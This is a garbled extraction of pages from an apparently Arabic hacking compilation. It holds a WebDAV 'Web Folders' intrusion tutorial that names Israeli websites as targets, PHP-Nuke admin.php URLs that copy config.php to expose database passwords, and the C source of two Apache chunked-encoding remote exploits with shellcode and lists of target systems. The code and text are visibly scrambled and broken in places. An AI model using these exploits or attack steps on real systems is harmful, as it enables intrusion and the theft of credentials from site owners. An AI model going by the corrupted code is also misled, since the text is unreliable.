المكتوبة بالبيرل‪:‬‬ ‫‪pl..‬‬ ‫كمثال‪:‬‬ ‫‪a..xxx...xxx..

com‬‬ ‫‪277‬‬ .‫انتهى‪،،،‬‬ ‫" تمتع بإختراق المواقع السرائيلية مع هذه الثغرة "‬ ‫>منقول من منتديات شبكة الحزم<‬ ‫>الكاتب‪<DeadLine :‬‬ ‫الشرح ‪:‬‬ ‫اوًل الثغره يا أخوان تطبق على سيرفرات ‪:‬‬ ‫‪Microsoft-IIS/5.0 on Windows 2000‬‬ ‫يا أخوان كل مانحتاجه هي اداه بسيطه يقدمها لنا وندوز ‪ 98‬وانني ل اعلم ان كانت النسخ الخرى تمتلك مثل‬ ‫هذه لخاصيه ام ل لنني اعمل على نظامين فقط لينكس ماندريك ووندوز ‪ 98‬فقط ‪:‬‬ ‫الداه هي ‪Web Folders :‬‬ ‫اين نجد هذه الثغره ‪:‬‬ ‫حسنًا سوف نجدها انشاءل في الخطوات التاليه ‪:‬‬ ‫ادخل على ‪My Computer‬‬ ‫ثم ستجدها هناك ليس داخل السي او شيء آخر بل داخل ‪ My Computer‬فقط يعني تكون هي مع السي‬ ‫والدي الى آخره‬ ‫نفتح يا أخون الملف المسمى ‪Web Folders‬‬ ‫ثم سنجد التي ‪:‬‬ ‫‪ Add Web Folder‬حيث هي التي ستكون اداتنا المهمه للختراق‬ ‫نفتح ال ‪: Add Web Folder‬‬ ‫حيث نجد كلمة ‪Type the location to add‬‬ ‫ونرى تحتها مستطيل نقوم بأدخال التي ‪:‬‬ ‫‪/http://hostname.

121‬‬ ‫ثم نضغط على كلمة ‪Next :‬‬ ‫وهنا سوف تعمل الداه بتحميل ملفات الموقع وتعطيك خاصية الدمن وهي تحميل وازالة الملفات‬ ‫فبعد ان ينتهي البرنامج من التحميل تظهر لك كلمة ‪finish :‬‬ ‫عندها تذهب الى ال ‪ Web Folder :‬وتجد ملف الموقع هناك ومسمى تحت ايبي الموقع‬ ‫موقع اخر للتطبيق ‪:‬‬ ‫‪http://www.‫حيث ان ‪ hostname‬هو ايبي الموقع انتبه قلنا ايبي الموقع وليس السم‬ ‫والجميع يعرف كيف يخرج اليبي تبع الموقع وهناك دروس كثيره بخصوص هذا الموضوع‬ ‫وهذه مواقع اسرائيليه للتطيبق حيث انها تعمل على ايبي موحد ‪:‬‬ ‫‪mail.co.il‬‬ ‫‪daihatsu-israel.84‬‬ ‫ملحظه ‪ :‬اذا تم طلب ادخال باسوورد ويوزر نيم فأعرف ان الثغره مغلقه‬ ‫او اذا دخلت الى الملفات ولم تجد اي ملف فمعناه ان الثغره مغلقه ايضًا‬ ‫اسئل ال التوفيق والعافيه اللهم امين اللهم امين‪.il‬‬ ‫ندخل بالمستطيل الذي تم ذكره ‪:‬‬ ‫‪/http://192.talcar.199.117.‬‬ ‫انتهى‪،،،‬‬ ‫‪278‬‬ .143.43.israwine.co.co.co.il‬‬ ‫‪daewoo-israel.il/ 212.

net/admin.txt&wdir=/images/&userfil e=config..Php nuke BUGGED :Found by LucisFero and supergate twlc/.." ‫" ثغرة نيوك‬ <‫>ةةةةة‬ >Arab VireruZ :‫>ةةةةةة‬ : ‫الشرح بالنقليزية‬ twlc: here your 0day from LucisFero and supergate Posted on Monday.php&file_name=hacked. or even upload files Systems Affected all the versions ARE vulnerable except '5.php&userfile_name=hacked.. is ok while the final 5.2 is (bugged Explanation ?Do you need sql password http://www.it allows you to 'cp' any file on . September 24 @ 14:25:58 CDT topic: advisories twlc security divison 24/09/2001 .the box...0 RC1' (i wonder why a released c. Summary This time the bug is really dangerous.php? upload=1&file=config..txt 279 .server.

...fear him and you should too :posted at http://www. this software is used by thousands of people.. and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke .net/images/hacked..("Header("Location: admin. cause we wanted to remove the file manager -anyway but i suggest you to do the same.php// .()displaydir// .... you can even upload files.textcols = 85$ .. 2 hours before didnt knew php .php that as everyone knows contain the sql's passwords."/"=if(!$wdir) $wdir .()CloseTable// .$wdir..("include("footer.twlc.php contains this routine . -to upload files use FTP :conclusions yet another bug of php nuke. admin.. $wdir2 .the admin 'login' page will be prompted just go to http://www...php?sid=421 bugtraq@securityfocus." $userfile_name --> $wdir$ This need a rewrite -------------------------------------> OMG! WE TOTALY // AGREEEEEEEE lmao ..()html_header// ._UPLOADED.(GraphicAdmin($hlpfile// .can use it anyway Solution we erased the function."/"=wdir2$ .net/article..php// .. so you .twlc."lastaction = "". (we run something based on it too) i hope that this time the author will reply soon and will release a patch too! as i said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories...net article http://www. so i (supergate) .php?op=FileManager ."if($cancel) $op="FileManager } (if($upload . Prolly the funny thing is that who first discovered the bug was LucisFero that.(chdir($basedir ..$basedir.(udir = dirname($PHP_SELF$ .(copy($userfile.exit { that doesnt do a check to see if you are logged as admin or no.textrows = 20$ .(basedir = dirname($SCRIPT_FILENAME$ ..("include("header..and NOT TO LET YOU HAVE FUN :let me explain you the bug.server..txt and you will see config.com 280 .i leave you the 'fun' to find all the ways to use it.$userfile_name .

(copy($userfile..(udir = dirname($PHP_SELF$ ..textrows = 20$ .php?op=FileManager .txt&wdir=/images/&userfil e=config.(chdir($basedir . insults."/"=if(!$wdir) $wdir .$userfile_name .php&file_name=hacked.exit { -=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= =-=-=-=-=-=-=-=-=-=-= :‫الثغرة‬ http://www. bella a tutti eof -=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= =-=-=-=-=-=-=-=-=-=-= :‫الخطأ البرمجي‬ ." $userfile_name --> $wdir$ This need a rewrite -------------------------------------> OMG! WE TOTALY // AGREEEEEEEE lmao .-http://www._UPLOADED. remember that trojans are :(directed to /dev/null lucisfero@twlc. ideas.net (http://www. cool girls.php&userfile_name=hacked.server.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System and of course mailed to the author of php nuke contacts (bugs.(GraphicAdmin($hlpfile// .php// ."if($cancel) $op="FileManager } (if($upload .php? upload=1&file=config.$basedir.org -good luck http://sourceforge.("include("footer. $wdir2 .()html_header// .()CloseTable// .net/admin.peace out pimps."lastaction = "".txt 281 .textcols = 85$ .("Header("Location: admin.phpnuke.php// .()displaydir// .$wdir."/"=wdir2$ .net supergate@twlc.("include("header.(basedir = dirname($SCRIPT_FILENAME$ .net (yes we are patched .twlc.

‫=‪-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-‬‬ ‫=‪=-=-=-=-=-=-=-=-=-=-‬‬ ‫الثغرة بعد التعديل‬ ‫?‪http://www.com‬بالموقع الراد اختراقه‬ ‫‪ -2‬تأكد من موقع المجلة مثال ‪http://server.php&userfile_name=ultramode.com/nuke :‬‬ ‫‪ -3‬هذه الثغرة ل تعمل مع اصدار ‪ 5.txt&wdir=/&userfile=co‬‬ ‫‪nfig.txt‬‬ ‫وستجد باس واليوزر التابع لقاعدة بيانات الموقع=‪-‬‬ ‫ملحظات‬ ‫‪ -1‬بدل ‪ server.php‬‬ ‫‪upload=1&file=config.2‬كما يظن البعض‪.com/ultramode.‬‬ ‫انتهى‪،،،‬‬ ‫‪282‬‬ .server.php&file_name=ultramode.net/admin.txt‬لن تحتاج تحميل ملف‬‫نصي لطبع الملف‬ ‫كما هو موجود بالشرح النقليزي يعني فكر واستنتج ‪ (-:‬ولن بعض المواقع تمنع التحميل الى الموقع الن‬ ‫ما عليك سوى الدخول الى ‪http://server.txt‬‬ ‫=‪-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-‬‬ ‫=‪=-=-=-=-=-=-=-=-=-=-‬‬ ‫عمل الثغرة‪:‬‬ ‫=طبع ملف الكونفيج ‪ config.php‬الى الملف النصي الموجود ‪ ultramode.

org/dist/httpd/binaries‬‬ ‫أما لمسألة إستثمار هذه الثغره فسوف أضع لكم أفضل أستثمارين‬ ‫الخطأ في أباتشي ‪ 1.24‬واعلى إلى ‪ 2‬و من ‪ 2‬إلى ‪ ، dev-2.3.36‬وهي في الروتين البرمجي الذي‬ ‫يتعامل مع رسائل الخطأ‬ ‫هذان الستثماران تستخدمان من قبل مهاجم بعيد لتسبب طفح محلي في السيرفر المصاب ‪ ،‬مؤديه بذلك إلى‬ ‫إعادة كتابه في الذاكرة ‪ ،‬وبطريقة ما تسمح لتنفيذ كود‬ ‫‪ ))*/‬قد تم تجريبها وإختبارها من قبل ‪ angels-bytes.0.‫" ثغرة ‪" Chunked‬‬ ‫>ةةةةة ةة ةةةة‬ ‫‪<angels-bytes‬‬ ‫كلنا سمع بثغره تسمى ‪ Chunked‬لـ ‪ ، Apache‬السبب لعدم تحدث موقع ‪ angels-bytes‬عنها هو‬ ‫أنها أتت قبل إنطلق الموقع ‪ ،‬الن سأضع ‪ ، Retina Apache Chunked Scanner‬وهي أداة‬ ‫تقوم بفحص نطاق من ‪ 254‬عنوان آي بي ‪ ،‬وتظهر لك ما منها مصاب بهذه الثغره‪.apache.39‬فهو الفضل الى الن‬ ‫هذه هي وصلة التنزيل‬ ‫‪http://www.‬‬ ‫إذا أردت معالجة هذه الثغره عند وجودها فأنصحك بتنزيل أباتشي ‪ 2.0.com‬قبل وضعها لكم هنا ((‬ ‫*‪/‬‬ ‫‪*/‬حصلنا عليها من سيكورتي تيم*‪/‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪283‬‬ .

define PUT_BYTES(n. p += strlen(s# .include# include# define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it# /* failed define RET_ADDR_INC 512# define MEMCPY_s1_OWADDR_DELTA -146# define PADSIZE_1 4# define PADSIZE_2 5# define PADSIZE_3 7# define REP_POPULATOR 24# define REP_RET_ADDR 6# define REP_ZERO 36# define REP_SHELLCODE 24# define NOPCOUNT 1024# define NOP 0x41# '\\define PADDING_1 \\'A# '\\define PADDING_2 \\'B# '\\define PADDING_3 \\'C# .(define PUT_STRING(s) memcpy(p. b. p += n# define SHELLCODE_LOCALPORT_OFF 30# = []char shellcode \x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\ \\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\ "\\\x1f\\ \x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\ \\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\ "\\\x02\\ \x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\ \\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\ "\\\x04\\ \x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\ \\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\ "\\\xb8\\ \x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\ \\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\ "\\\x03\\ \x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\ \\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\ "\\\x89\\ 284 . s. strlen(s)). n). b) memset(p.

3. 0xcf92f"\\\ } .int sock .("\\\printf(\\\"Target ID / Target specification\\\\n (++for(i = 0.23\\\". progress . *p .1 x86 / Apache 1.1 x86 / Apache 1. 0x8f0aa"\\\ } .struct sockaddr_in sin. yes theo.{ OpenBSD 3./apache-scalp 3 127.--. targets[i].{ OpenBSD 3. j.1 x86 / Apache 1. that say OpenBSD here { .1:8080\\\\n .0.type .int bruteforce. from } (if(argc != 3 . lport .("\\\127.("\\\printf(\\\" Using targets:\\\\t..20\\\". 0x90600"\\\ } .unsigned char buf[512].int i.u_long retaddr !targets[] = { // hehe.----\\\\n .0.{ OpenBSD 3.return -1 { 285 .Potential targets list .("\\\printf(\\\"\\\\n--. *portp ."\\\xcc\\ } struct .20\\\". i . char *argv .char *hostp.0 x86 / Apache 1. i.char *type . 0x9011a"\\\ } .1:8080\\\\n printf(\\\" Using bruteforce:\\\\t. i < sizeof(targets)/8.(printf(\\\"\\\\t%d / %s\\\\n\\\".([printf(\\\"Usage: %s \\\\n\\\".24 #2\\\".0.3.3.{ } ([]int main(int argc.0./apache-scalp 0x8f000 .22\\\".0 x86 / Apache 1. argv[0 .3.3.{ OpenBSD 3.--.0 x86 / Apache 1. *expbuf.3. 0x8f2a6"\\\ } .\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\ \\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\ "\\\x80\\ \x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\ \\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\ "\\\x50\\ \x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\ \\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\ .{ OpenBSD 3.1 x86 / Apache 1.{ OpenBSD 3.24\\\". 0x90600"\\\ } . owned. 0x932ae"\\\ } .u_long retaddr .3.{ OpenBSD 3.24\\\".

"\\\portp = \\\"80 .. SOCK_STREAM.i = retaddr & 0xff (if(i == 0x0a || i == 0x0d .(i = sizeof(from } (if(getsockname(sock.retaddr += RET_ADDR_INC /* skip invalid return adresses */ .sin. &i) != 0 . (struct sockaddr *) & from.++retaddr ((else if(memchr(&retaddr.(signal(SIGPIPE. SIG_IGN } (for(owned = 0. 16 } (if(retaddr < sizeof(targets)/8 .("\\\:"\\\ .(exit(1 { .sin_family = AF_INET .retaddr = targets[retaddr].s_addr = inet_addr(hostp .bruteforce = 0 { else ..[hostp = strtok(argv[2 (if((portp = strtok(NULL. 0x0d.continue .bruteforce = 1 . \\\":\\\")) == NULL .retaddr .(()srand(getpid . 0x0a.("\\\ .("\\\()perror(\\\"getsockname . 4 .(retaddr = strtoul(argv[1]. sizeof(sin)) != 0 .(exit(1 { (if(!progress .printf(\\\"\\\\n[*] Connecting . progress = 0..((sin. NULL. 0 . 4) || memchr(&retaddr.sin_port = htons(atoi(portp (if(!progress .(sin.("\\\()perror(\\\"connect .("\\\printf(\\\"connected!\\\\n /* Setup the local port in our shellcode */ .(sock = socket(AF_INET.sin_port 286 .(lport = ntohs(from. (struct sockaddr *) & sin.(fflush(stdout } (if(connect(sock.sin_addr.

j < REP_RET_ADDR. sizeof(buf) .p++ = (retaddr >> 24) & 0xff* { .((REP_POPULATOR .++progress (if((progress%70) == 0 . \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".("\\\PUT_STRING(\\\"\\\\r\\\\n { } (++for (i = 0..p++ = retaddr & 0xff* .p++ = (retaddr >> 8) & 0xff* .("\\\PUT_STRING(\\\"\\\\r\\\\n { .p += sizeof(shellcode) .(snprintf(buf.("\\\ :"\\\)PUT_STRING .shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * (REP_SHELLCODE PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) + . p .("\\\PUT_STRING(\\\"GET / HTTP/1.(PUT_BYTES(NOPCOUNT.1 .(PUT_BYTES(REP_ZERO. shellcode. i . j .1 .(PUT_STRING(buf .(MEMCPY_s1_OWADDR_DELTA . NOP .(write(sock. sizeof(shellcode) . 0 . . i < REP_POPULATOR.("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n .(PUT_BYTES(PADSIZE_3.expbuf . PADDING_1 . expbuf.("\\\-PUT_STRING(\\\"X .(PUT_STRING(buf .shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff . PADDING_2 snprintf(buf.(memcpy(p.progress = 1 287 .1. PADSIZE_2 . sizeof(buf) .("\\\ :"\\\)PUT_STRING } (++for (j = 0.1. i < REP_SHELLCODE. PADDING_3 .1\\\\r\\\\nHost: apache-scalp. i .(PUT_BYTES(PADSIZE_2.c\\\\r\\\\n } (++for (i = 0. \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".(PUT_BYTES(PADSIZE_1.("\\\-PUT_STRING(\\\"X .p++ = (retaddr >> 16) & 0xff* .

NULL.(write(1. n 288 . buf.break } (if(!owned && n >= 4 && memcmp(buf.(write(sock. 74 . sizeof(buf) .(puts(buf (if(bruteforce .(fflush(stdout } (while (1 . &tv) > 0 } ((if(FD_ISSET(sock.tv.} (if(progress == 1 .((memset(buf + strlen(buf). retaddr sprintf(expbuf.fd_set fds . expbuf. localport ."\\\%u . now use 0day OpenBSD local .((memset(buf.'\\)putchar { else . sizeof(buf } (if(select(sock + 1. sizeof(buf) .((write(sock.tv.(retaddr. buf. \\' \\'. buf. \\\"uname -a.expbuf). n { } ((if(FD_ISSET(0. &fds. 0. \\\"\\\\nok\\\\n\\\".strlen(buf .(FD_SET(0. &fds .int n .echo hehe. lport . length %u.('\\putchar((rand()%2)? \\'P\\': \\'p .(exit(1 .('\\.(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\".(FD_SET(sock. NULL.id.((memset(buf.(FD_ZERO(&fds . &fds (if((n = read(sock. 0.("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n . &fds .("\\\kernel exploit to gain instant r00t\\\\n . buf. (unsigned int)(p .1)) <= 0 . sizeof(buf sprintf(buf.tv_usec = 0 .tv_sec = EXPLOIT_TIMEOUT . strlen(expbuf .++owned { . &fds (if((n = read(0.struct timeval tv . \\\"\\\\r[*] Currently using retaddr 0x%lx. 4) == 0 .1)) < 0 .

("\\\fprintf(stderr. now use another# "\\\bug/backdoor/feature (hi Theo!) to gain instant r00t\\'.id.\\\\n define RET_ADDR_INC 512# define PADSIZE_1 4# define PADSIZE_2 5# define PADSIZE_3 7# 289 .{ { (if(!owned .return 0 { :Exploit #2 include# include# include# include# include# include# include# include# include# include# include# __ifdef __linux# include# endif# /* define HOST_PARAM \\\"apache-nosejob. hehehe!\\\\n .echo \\'hehe.break { .return -1 { { .(close(sock (if(owned ..c\\\" /* The Host: field# define DEFAULT_CMDZ \\\"uname -a. \\\"Ooops.return 0 } (if(!bruteforce .(free(expbuf .

(define PUT_STRING(s) memcpy(p.define REP_POPULATOR 24# define REP_SHELLCODE 24# define NOPCOUNT 1024# define NOP 0x41# '\\define PADDING_1 \\'A# '\\define PADDING_2 \\'B# '\\define PADDING_3 \\'C# . b. s. b) memset(p. p += strlen(s# .define PUT_BYTES(n. p += n# = []char shellcode \x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6 \\\ "\\\x04\\\\x24\\ \x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\ "\\\ \\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1 \\\ "\\\xea\\\\x31\\ \xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\ "\\\ \\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80 \\\ "\\\x7c\\\\x24\\ \x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\ "\\\ \\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04 \\\ "\\\x20\\\\x89\\ \x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\ "\\\ \\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24 \\\ "\\\x14\\\\x89\\ \x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\ "\\\ \\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d \\\ "\\\xcd\\\\x80\\ \x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff \\\ "\\\x04\\\\x24\\ \x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\ "\\\ \\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51 \\\ "\\\x50\\\\xb0\\ \x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\ "\\\ \\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\ "\\\x41\\\\x80\\ \xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0 \\\ "\\\xb0\\\\x5a\\ \xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\ "\\\ \\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\ "\\\xc0\\\\x50\\ \xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\ "\\\ \\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68 \\\ "\\\x2a\\\\x47\\ \x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\\\\ "\\\ 290 . strlen(s)). n).

2 x86 / Apache 1.3. 0x98a00. /* we repeat retaddr thiz many times in the buffer /* int repzero. -146.3.("\\\printf(\\\"Usage: .5./apache-nosejob <-switches> -h host[:80]\\\\n .0 x86 / Apache 1. 6. -146.3.3.{ NetBSD 1.5. yes theo.c\\\\n\\\\n ."\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\ .3. 0x8f2a6. 6.2 x86 / Apache 1.{ OpenBSD 3.1 x86 / Apache 1.{ FreeBSD 4. 0x932ae.3. -146.("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd. -150. 0x80a0000/fbsd.2 x86 / Apache 1.24\\\".{ NetBSD 1. -146.apache. 42"\\\ } .{ OpenBSD 3.2.2 x86 / Apache 1.3. 6. -146. 36"\\\ } OpenBSD 3. that say OpenBSD here { .23 (Unix)\\\". 5. 0xcfa00. 6. (o)penbsd. /* description for newbie penetrator /* !int delta. 36"\\\ } . 6.{ } (void usage(void . 0x80efa00. 6. 0x80f3a00.1 x86 / Apache 1.0 x86 / Apache 1. 36"\\\ } .1 x86 / Apache 1. (n)etbsd\\\\n . 0x90600. 36"\\\ } . 36"\\\ } .5 x86 / Apache/1. 6.20\\\".3.12 (Unix)\\\".("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n .24 (Unix)\\\".3. -146.2 x86 / Apache 1. -90.5.int i printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t.23\\\".1 x86 / Apache 1.{ OpenBSD 3. 5. 42 "\\\ } .3. -146.20\\\".3. /* delta thingie /* u_long retaddr.23 (Unix)\\\".victim . 36"\\\ } . 36"\\\ } . 6. 0x80efa00. /* and \\\\0\\'z this many times !targets[] = { // hehe.24 #2\\\". 42 "\\\ } . 36"\\\ } .("\\\printf(\\\" Bruteforcing options (all required. -90.{ NetBSD 1. -146.20 (Unix)\\\".0 x86 / Apache 1.{ OpenBSD 3. -146.3.24\\\". 0x80efa00.("\\\nosejob. unless -o is used!):\\\\n .{ OpenBSD 3. 6."\\\ } .24 PHP 4.1 x86 / Apache 1.("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd. -150.{ OpenBSD 3.{ FreeBSD 4.0 x86 / Apache 1.\\\\n . 0x80efa00. 42 "\\\ } . -90.3. 0x8f0aa.1\\\".{ OpenBSD 3.3. 36"\\\ } . 291 . -90.3. 6.{ 36 . -90. 6. 42 "\\\ } .\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\ "\\\xcd\\\\x80\\ \x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\ \\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\ "\\\xe3\\\\x50\\ \x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\ .{ OpenBSD 3. 0x80a7975.3. 0x80eda00.5 x86 / Apache/1. 36"\\\ } .24 #2\\\".{ NetBSD 1. 5. 5. 5.22\\\". 0x9011a.23 (Unix)\\\".5.22 (Unix)\\\".("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n .{ NetBSD 1. 0x90600.("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.5. 0x1d7a00. /* return address /* int repretaddr. } struct /* char *type.

targets[i].(exit(1 { } ([]int main(int argc.hostp = strtok(optarg (if((portp = strtok(NULL. *expbuf.("\\\replies\\\\n .struct hostent *he (if(argc < 4 . i.------. -90/nbsd.pdf\\\\n .("\\\overwrite\\\\n . sock .("\\\0x080e0000/nbsd. progress.("\\\printf(\\\"\\\\n--.\\\\n printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the . *portp.char *hostp. *p . i .("\\\buffer\\\\n .("\\\:"\\\ .("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n printf(\\\"\\\\nExamples will be published in upcoming apache-scalp. *cmdz = DEFAULT_CMDZ . i < sizeof(targets)/sizeof(victim). char *argv . \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1 } (switch(i /* required stuff */ :'\\case \\'h .("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the .int bruteforce.int i. owned.()usage .bruteforce = 0 .--. \\\":\\\")) == NULL .("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n .("\\\buffer\\\\n .struct in_addr ia .retaddr. lport. from .8lx / %s\\\\n\\\".((memset(&victim. j.int responses.("\\\printf(\\\" ID / Return addr / Target specification\\\\n (++for(i = 0.("\\\HOWTO.------------\\\\n .\\\\n printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to .--."\\\portp = \\\"80 292 . -150/fbsd.("\\\printf(\\\" Optional stuff:\\\\n printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for .(printf(\\\"% 3d / 0x%. 0.u_char buf[512].. shown_length = 0 . sc_timeout = 5 . sizeof(victim } (while((i = getopt(argc.struct sockaddr_in sin.Potential targets list .---. argv. targets[i].type .("\\\shellcode reply\\\\n printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode .("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd..

.break /* predefined targets */ :'\\case \\'t } ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim .break /* !bruteforce */ :'\\case \\'b . victim.victim."\\\victim.return -1 { .(victim.break :'\\case \\'z . 16 printf(\\\"Using 0x%lx as the baseadress while bruteforcing.victim.(victim. victim.. &targets[atoi(optarg)].repzero .break :'\\case \\'o .retaddr .repzero = 36 ."\\\victim.(printf(\\\"Using %d as delta\\\\n\\\".repretaddr = 6 .("\\\printf(\\\"Invalid target\\\\n .break :'\\case \\'r ."\\\victim.type = \\\"Custom target .(victim.victim.++bruteforce } (switch(*optarg :'\\case \\'f .break :'\\case \\'o . NULL.\\\\n\\\".retaddr = 0x80a0000 .((memcpy(&victim. .repretaddr = atoi(optarg printf(\\\"Repeating the return address %d times\\\\n\\\".++bruteforce ..type = \\\"OpenBSD 293 .victim.(victim.type = \\\"FreeBSD .delta = atoi(optarg .delta . sizeof(victim .break :'\\case \\'d .(printf(\\\"Number of zeroes will be %d\\\\n\\\".retaddr = strtoul(optarg.(victim.delta = -150 .repzero = atoi(optarg .(victim.repretaddr .

victim.(printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\".retaddr = 0x80000 .retaddr || !victim.delta = -90 .victim..victim.(shellcode\\\\n\\\".break :default .s_addr = inet_addr(hostp)) == INADDR_ANY .victim.repzero printf(\\\"[-] Incomplete target.break :'\\case \\'c .delta || !victim.repretaddr = 6 . At least 1 argument is missing (nmap .break :'\\case \\'n .(he = gethostbyname(hostp (if(he .break :default .()usage . 4 } (else if((ia.(fflush(stdout .repzero = 36 ."\\\victim. hostp 294 .("\\\ .repzero = 42 ..("\\\style!!)\\\\n .(memcpy(&ia.delta = -146 .printf(\\\"[*] Resolving target host .type = \\\"NetBSD .return -1 { .victim.break { .("\\\printf(\\\"[-] Better luck next time!\\\\n .break { { } (if(!victim.cmdz = optarg . sc_timeout .victim.repretaddr = 5 .victim.s_addr.repretaddr || !victim.(sc_timeout = atoi(optarg printf(\\\"Waiting maximum %d seconds for replies from .victim.retaddr = 0x080e0000 . he->h_addr.break /* optional stuff */ :'\\case \\'w .

